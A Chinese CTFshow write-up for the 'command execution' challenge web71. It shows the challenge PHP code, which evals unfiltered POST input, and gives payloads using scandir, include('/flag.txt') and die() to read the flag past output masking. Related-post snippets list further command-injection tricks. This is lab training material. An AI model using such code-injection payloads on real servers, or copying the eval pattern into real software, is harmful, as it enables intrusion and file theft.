源码

<?php/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);$s = ob_get_contents();ob_end_clean();echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{highlight_file(__FILE__);
}?>你要上天吗？

思路

知识点

ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空（擦除）缓冲区并关闭输出缓冲

关于缓存区的,可以参考大佬博客

https://www.cnblogs.com/raobenjun/p/8086051.html

读取的文件内容会进入缓冲区存进变量s中,关闭缓冲区,然后再用echo输出s中的内容(数字字母被替换成?).绕过的方法很简单,就是执行完我们传入的代码然后直接结束程序不执行后面的代码,用die()或者exit(0)

题解

c=var_export(scandir("/"));die();

c=include(’/flag.txt’);die();
拿到flag

总结

水题

CTFshow 命令执行 web71相关推荐

CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
[CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
CTFshow 命令执行 web72
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客文章目录命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用用文件包含其实这个做法也是靠刷题经验猜flag路径 c=includ ...
[CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
ctfshow命令执行（持续更新，已更至web39）
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
CTFshow 命令执行 web56
目录源码思路题解总结源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

CTFshow 命令执行 web71

目录

源码

思路

题解

总结

CTFshow 命令执行 web71相关推荐

最新文章

热门文章